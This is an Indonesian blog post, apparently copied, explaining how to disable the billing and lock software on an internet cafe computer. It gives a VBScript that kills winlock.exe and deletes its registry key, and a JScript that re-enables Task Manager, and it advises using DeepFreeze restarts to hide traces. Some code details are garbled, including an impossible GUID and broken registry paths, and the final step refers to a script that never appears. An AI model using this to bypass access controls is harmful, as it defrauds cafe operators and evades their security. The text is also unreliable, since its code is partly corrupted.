Cara Mematikan Billing Warnet

Cara Mematikan Billing Warnet

Cara Mematikan Billing Warnet

Cara Mematikan Billing Warnet
Cara Mematikan Billing Warnet

Cara Mematikan Billing Warnet
Okey, Pasti semua udah tau winlock itu apa kan ? Kalo belum tau search aja di google yah, hihihihi. Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut. Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut. Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. OK. Yang dibutuhin cuma Notepad / Wordpad.
Pikirkan gimana caranya buat buka notepad tersebut. Banyak caranya. Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music.
Ya tinggal save as >> pilih desktop >> terus save dengan ekstensi .txt / .doc deh.. Ok langsung aj ya, udah dibuka notepad/wordpad? Usahakan cek dulu ada deepfreeze atau kagak. Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer. Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.
Copy script ini: strComputer = “.”
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(”Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next Const HKEY_CLASSES_ROOT = &H80000000
strComputer = “.”
Set objRegistry=GetObject(”winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)
strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”
objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName
Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya. Sebenarnya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.
Keterangan:
Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?
Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

Sekarang step 2. (AKTIFKAN TASK MANAGER) Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt). Kalo taskmanager / startnya gak didisable, bisa langsung aja buka command prompt di accesories. Dan coba saja windows+R, kalau bisa, ya langsung aja copy script aktifkan command promptnya dibawah.
/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(”HKCU\\Software\\micr*soft\\Windows \\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DW ORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(”WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.netrix.web.id [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.www.netrix.web.id”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.www.netrix.web.id ”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.www.netrix.web.id”;
prakata(pesan);
}
Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager. Lalu buka task manager (ctrl+alt+del) >> Pilih tab users >> Klik menu File >> Pilih Run >> Lalu copy paste script ini di situ.

Sumber : https://cialis.id/